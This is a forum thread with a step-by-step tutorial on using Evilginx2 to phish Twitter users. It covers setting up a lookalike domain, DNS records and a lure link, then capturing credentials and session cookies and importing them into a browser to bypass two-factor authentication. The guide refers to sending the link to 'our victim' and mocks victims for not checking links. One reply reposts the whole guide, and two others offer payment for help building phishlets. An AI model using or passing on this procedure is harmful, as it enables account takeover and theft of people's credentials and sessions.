Article Evilginx2 - Phishing. Bypassing 2FA.

K

kluster

Премиум
02.01.2019
27
50
Hello to Codeby.net forum guests and members.

In this article we will talk about phishing and 2factor authentication bypassing with help of great tool – Evilginx2. I already wrote about it previous version. Who is interested in it can find. But the article turned out weak because there was not big desire to understand deeply into functionality, that is why the simple overview was released.
The second version of Evilginx, attract me by it feature to help pentesters and other good people to bypass 2-factor-autentification and get account data from different accounts of our target.

So, let’s start work.

Evilginx2 - Phishing. Bypassing 2FA.


Evilginx2 is a framework like «man-in-the-middle» which is ised for phishing account data for entrance to system with session cookie-files which help to bypass 2 factor autentification protection.

This tool is son of Evilginx developed in 2017, which used custom HTTP nginx server version to ensure the functionality of the "man in the middle" as a proxy between browser and phishing web site. True version fully developed on GO, like an separate application.

Evilginx2 – realizes own HTTP and DNS – server that makes him really simple in adjusting and using.

In role of attacking system I use Kali Linux Full Upgrade and because Evilginx2 developed on GO, install it’s latest versions.

- sources files in archive.

Evilginx2 - Phishing. Bypassing 2FA.


Код:
wget https://dl.google.com/go/go1.11.5.src.tar.gz
Evilginx2 - Phishing. Bypassing 2FA.


And extract to specified path:

Код:
tar –C /usr/local –xzf go1.11.5.linux-amd64.tar.gz
Evilginx2 - Phishing. Bypassing 2FA.


Add in your .bashrc (or another account file) functions for GO launching

Код:
export GOPATH=$HOME/go
export PATH=$PATH:/usr/local/go/bin:$GOPATH/bin
Evilginx2 - Phishing. Bypassing 2FA.


Now we can install Evilginx2

Код:
go get -u github.com/kgretzky/evilginx2
cd $GOPATH/src/github.com/kgretzky/evilginx2
Evilginx2 - Phishing. Bypassing 2FA.


Код:
make
And perform trial launch without any settings

Код:
evlginx2
Evilginx2 - Phishing. Bypassing 2FA.


Move to practice
Ensure that there are no any services listening TCP 443, 80 and UDP 53

Код:
netstat -tplnu
Evilginx2 - Phishing. Bypassing 2FA.


Evilginx2 will tell you while launching if it will not able to open socket on any of these ports.

By default evilginx2 will look for phishlets in directory ./phishlets and then in /usr/share/evilginx /phishlets/ . If you want to specify your own path to phishlets download use -p parameter <phishlets_dir_path> when you run the tool.

You can call help:
Код:
evilginx2 –h
Evilginx2 - Phishing. Bypassing 2FA.

Also there is the internal help in evilginx

Evilginx2 - Phishing. Bypassing 2FA.


Move to adjusting the tool before perform an attack

Register a domain and adjust name servers (ns1 and ns2) in administrator panel to make them indicate on IP of your Evilginx server .

Evilginx2 - Phishing. Bypassing 2FA.


Adjust domain and IP address of your server using the next commands:

Код:
config domain yourdomain.com
config ip (your ip)
Evilginx2 - Phishing. Bypassing 2FA.


Now you can adjust phishlet which you want to use. In this case it will be phishlet Twitter. Set hostname for phishlet (it have to contain your domain)

Код:
phishlets hostname twitter twitter.com.maligncorp.com
Evilginx2 - Phishing. Bypassing 2FA.


Then we need to get CNAME for twitter's phishlet and set them in admin panel of Domain provider:

Canonical name (CNAME record) - is a type of DNS record which binds nickname to real (canonical) domain name. CNAME records usually are used for subdomain binding such as www or mail to domain which contains content of this subdomain. For example, CNAME record is able to bind web address to web site for example.com domain.

Код:
phishlets get-hosts twitter
Evilginx2 - Phishing. Bypassing 2FA.


Add this names in control panel

Evilginx2 - Phishing. Bypassing 2FA.


Enable phishlet

Код:
phishlets enable twitter
Wait for certificates and if everything is good - we will see such message.

Evilginx2 - Phishing. Bypassing 2FA.


Make redirect to original twitter's domain

Код:
config redirect_url http://twitter.com
Evilginx2 - Phishing. Bypassing 2FA.


Then we need to create a bait, phishing path to the authorization form on Twitter, this is done like this:

Код:
lures create twitter
Evilginx2 - Phishing. Bypassing 2FA.

Copy path and add to our phishing link, eventually it must looks like this

Код:
https://twitter.com.maligncorp.com/jNvKjIkI
Share it with our victim and wait for a result like this

Evilginx2 - Phishing. Bypassing 2FA.


For the victim, the whole process looks like this:

Evilginx2 - Phishing. Bypassing 2FA.


Yes I know the link looks "weird" (in defense I will say - HTTPS) but who looks on it? =) In our case....
Login and pass entering ......aaaand

Evilginx2 - Phishing. Bypassing 2FA.


Check for intercepted sessions. If the password was entered correctly and entrance in account was successfully performed in the table in the "tokens" column we will see "captured" value. It means that we also got Cookies!

Evilginx2 - Phishing. Bypassing 2FA.


To avoid login and password entering lets use them to enter in victims account.

Код:
sessions 7
Evilginx2 - Phishing. Bypassing 2FA.


Copy this all, go to twitter.com in your browser and use EditThisCookie addon. Import the data and reload page.

Evilginx2 - Phishing. Bypassing 2FA.


It is ok. Now a little reference about two factor authentication:

Two factor authentication - is user authentication way in any service (usually in the Internet) with help of requesting authentication data of two different types. It provides a two level what means more effective account protection from unauthorized entry. In practice it usually looks like that : first frontier is login and password, the second one is a special code, coming in sms or email. More rarely the second frontier requires special USB key or biometrical user data. Totally the main point is very simple: to enter somewhere you need to confirm the fact that it is you with help of two "keys" one of which you have and another one contain in your memory.

Lets consider the situation when the victim need to restore password.

Evilginx2 - Phishing. Bypassing 2FA.


SMS from service come and we enter the special code

Evilginx2 - Phishing. Bypassing 2FA.


Our target resets the password. In this case we don't get it. Our profit is cookie.

Evilginx2 - Phishing. Bypassing 2FA.


Copy the data for import to the browser

Evilginx2 - Phishing. Bypassing 2FA.


Well done! You are the best!

Evilginx2 - Phishing. Bypassing 2FA.


That is all i wanted to tell. Evilginx2 - is really cool tool, I advice you to study the /phishlets directory content. I am sure you will find something for yourself.
It is noot a complete guide but I touched the most powerful side.

P.S. Youtube overeviews are not so good. Many details are missed.

Specially for CODEBY

source:
Evilginx2 - Фишинг. Обход ДФА
 

Вложения

Последнее редактирование модератором:
The Codeby

The Codeby

ООО Кодебай
30.12.2015
3 223
4 622
Great job! In gratitude - premium status for 1 year (for a start).
 
  • Нравится
Реакции: Vertigo
t0gl

t0gl

Well-known member
20.06.2018
161
185
Hello to Codeby.net forum guests and members.

In this article we will talk about phishing and 2factor authentication bypassing with help of great tool – Evilginx2. I already wrote about it previous version. Who is interested in it can find. But the article turned out weak because there was not big desire to understand deeply into functionality, that is why the simple overview was released.
The second version of Evilginx, attract me by it feature to help pentesters and other good people to bypass 2-factor-autentification and get account data from different accounts of our target.

So, let’s start work.

Посмотреть вложение 26440

Evilginx2 is a framework like «man-in-the-middle» which is ised for phishing account data for entrance to system with session cookie-files which help to bypass 2 factor autentification protection.

This tool is son of Evilginx developed in 2017, which used custom HTTP nginx server version to ensure the functionality of the "man in the middle" as a proxy between browser and phishing web site. True version fully developed on GO, like an separate application.

Evilginx2 – realizes own HTTP and DNS – server that makes him really simple in adjusting and using.

In role of attacking system I use Kali Linux Full Upgrade and because Evilginx2 developed on GO, install it’s latest versions.

- sources files in archive.

Посмотреть вложение 26441

Код:
wget https://dl.google.com/go/go1.11.5.src.tar.gz
Посмотреть вложение 26442

And extract to specified path:

Код:
tar –C /usl/local –xzf go1.11.5.linux-amd64.tar.gz
Посмотреть вложение 26443

Add in your .bashrc (or another account file) functions for GO launching

Код:
export GOPATH=$HOME/go
export PATH=$PATH:/usr/local/go/bin:$GOPATH/bin
Посмотреть вложение 26444

Now we can install Evilginx2

Код:
go get -u github.com/kgretzky/evilginx2
cd $GOPATH/src/github.com/kgretzky/evilginx2
Посмотреть вложение 26445

Код:
make
And perform trial launch without any settings

Код:
evlginx2
Посмотреть вложение 26446

Move to practice
Ensure that there are no any services listening TCP 443, 80 and UDP 53

Код:
netstat -tplnu
Посмотреть вложение 26447

Evilginx2 will tell you while launching if it will not able to open socket on any of these ports.

By default evilginx2 will look for phishlets in directory ./phishlets and then in /usr/share/evilginx /phishlets/ . If you want to specify your own path to phishlets download use -p parameter <phishlets_dir_path> when you run the tool.

You can call help:
Код:
evilginx2 –h
Посмотреть вложение 26448
Also there is the internal help in evilginx

Посмотреть вложение 26449

Move to adjusting the tool before perform an attack

Register a domain and adjust name servers (ns1 and ns2) in administrator panel to make them indicate on IP of your Evilginx server .

Посмотреть вложение 26450

Adjust domain and IP address of your server using the next commands:

Код:
config domain yourdomain.com
config ip (your ip)
Посмотреть вложение 26451

Now you can adjust phishlet which you want to use. In this case it will be phishlet Twitter. Set hostname for phishlet (it have to contain your domain)

Код:
phishlets hostname twitter twitter.com.maligncorp.com
Посмотреть вложение 26453

Then we need to get CNAME for twitter's phishlet and set them in admin panel of Domain provider:

Canonical name (CNAME record) - is a type of DNS record which binds nickname to real (canonical) domain name. CNAME records usually are used for subdomain binding such as www or mail to domain which contains content of this subdomain. For example, CNAME record is able to bind web address to web site for example.com domain.

Код:
phishlets get-hosts twitter
Посмотреть вложение 26454

Add this names in control panel

Посмотреть вложение 26455

Enable phishlet

Код:
phishlets enable twitter
Wait for certificates and if everything is good - we will see such message.

Посмотреть вложение 26456

Make redirect to original twitter's domain

Код:
config redirect_url http://twitter.com
Посмотреть вложение 26457

Then we need to create a bait, phishing path to the authorization form on Twitter, this is done like this:

Код:
lures create twitter
Посмотреть вложение 26458
Copy path and add to our phishing link, eventually it must looks like this

Код:
https://twitter.com.maligncorp.com/jNvKjIkI
Share it with our victim and wait for a result like this

Посмотреть вложение 26460

For the victim, the whole process looks like this:

Посмотреть вложение 26461

Yes I know the link looks "weird" (in defense I will say - HTTPS) but who looks on it? =) In our case....
Login and pass entering ......aaaand

Посмотреть вложение 26462

Check for intercepted sessions. If the password was entered correctly and entrance in account was successfully performed in the table in the "tokens" column we will see "captured" value. It means that we also got Cookies!

Посмотреть вложение 26463

To avoid login and password entering lets use them to enter in victims account.

Код:
sessions 7
Посмотреть вложение 26464

Copy this all, go to twitter.com in your browser and use EditThisCookie addon. Import the data and reload page.

Посмотреть вложение 26465

It is ok. Now a little reference about two factor authentication:

Two factor authentication - is user authentication way in any service (usually in the Internet) with help of requesting authentication data of two different types. It provides a two level what means more effective account protection from unauthorized entry. In practice it usually looks like that : first frontier is login and password, the second one is a special code, coming in sms or email. More rarely the second frontier requires special USB key or biometrical user data. Totally the main point is very simple: to enter somewhere you need to confirm the fact that it is you with help of two "keys" one of which you have and another one contain in your memory.

Lets consider the situation when the victim need to restore password.

Посмотреть вложение 26470

SMS from service come and we enter the special code

Посмотреть вложение 26471

Our target resets the password. In this case we don't get it. Our profit is cookie.

Посмотреть вложение 26472

Copy the data for import to the browser

Посмотреть вложение 26473

Well done! You are the best!

Посмотреть вложение 26474

That is all i wanted to tell. Evilginx2 - is really cool tool, I advice you to study the /phishlets directory content. I am sure you will find something for yourself.
It is noot a complete guide but I touched the most powerful side.

P.S. Youtube overeviews are not so good. Many details are missed.

Specially for CODEBY

source:
Evilginx2 - Фишинг. Обход ДФА
You have made a mistake /usr/locale
and first evilginx
 
Последнее редактирование:
marco matteo

marco matteo

New member
03.04.2019
1
0
Hello, I need a little bit help to finish one of my phishlets. I am ready to pay for your time/work, please add me icq 10777333
 
H

hardknocklife

Member
21.08.2019
9
0
Ребята, кто может помочь мне эффективно установить модлишки, а также научит создавать новые фишлеты? Я с удовольствием заплачу за ваше время. Благодарю вас
 
Мы в соцсетях:  ТелеграмВконтактеДзенФейсбукТвиттерЮтуб